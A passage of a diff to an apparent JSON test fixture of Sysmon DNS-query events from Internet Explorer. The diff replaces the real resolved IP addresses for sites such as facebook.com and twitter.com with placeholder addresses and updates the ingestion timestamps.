Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:11.066Z", @@ -20153,12 +19884,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { 
@@ -20175,13 +19906,13 @@ "tps10221.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313983101Z", + "ingested": "2021-12-09T13:49:44.740061500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:11.066Z", @@ -20245,11 +19976,11 @@ "type": "CNAME" }, { - "data": "31.13.71.36", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -20257,7 +19988,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -20265,7 +19996,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { 
@@ -20273,7 +20004,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -20281,21 +20012,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "31.13.71.36", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -20311,22 +20042,22 @@ "www.facebook.com" ], "ip": [ - "31.13.71.36", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313984372Z", + "ingested": "2021-12-09T13:49:44.740067300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:31.13.71.36;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:17.272Z", 
@@ -20406,12 +20137,12 @@ "type": "CNAME" }, { - "data": "192.229.163.25", + "data": "192.168.163.25", "type": "A" } ], "resolved_ip": [ - "192.229.163.25" + "192.168.163.25" ] }, "network": { 
@@ -20431,13 +20162,13 @@ "platform.twitter.com" ], "ip": [ - "192.229.163.25" + "192.168.163.25" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313985639Z", + "ingested": "2021-12-09T13:49:44.740073100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.229.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent 
xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.168.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:17.272Z", 
@@ -20497,23 +20228,23 @@ }, "answers": [ { - "data": "104.244.42.8", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.244.42.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.244.42.136", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.244.42.72", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -20521,7 +20252,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -20529,7 +20260,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -20537,7 +20268,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -20546,17 +20277,17 @@ } ], "resolved_ip": [ - "104.244.42.8", - "104.244.42.200", - "104.244.42.136", - "104.244.42.72", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, 
@@ -20572,24 +20303,21 @@ "syndication.twitter.com" ], "ip": [ - "104.244.42.8", - "104.244.42.200", - "104.244.42.136", - "104.244.42.72", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313986894Z", + "ingested": "2021-12-09T13:49:44.740079100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:104.244.42.8;::ffff:104.244.42.200;::ffff:104.244.42.136;::ffff:104.244.42.72;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:17.272Z", @@ -20653,12 +20381,12 @@ "type": "CNAME" }, { - "data": "172.217.10.34", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "network": { 
@@ -20674,13 +20402,13 @@ "ade.googlesyndication.com" ], "ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313988192Z", + "ingested": "2021-12-09T13:49:44.740085Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:21.552Z", @@ -20748,12 +20476,12 @@ "type": "CNAME" }, { - "data": "72.21.81.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.81.200" + "89.160.20.156" ] }, "network": { 
@@ -20770,13 +20498,13 @@ "iecvlist.microsoft.com" ], "ip": [ - "72.21.81.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313989505Z", + "ingested": "2021-12-09T13:49:44.740091Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:33.148Z", @@ 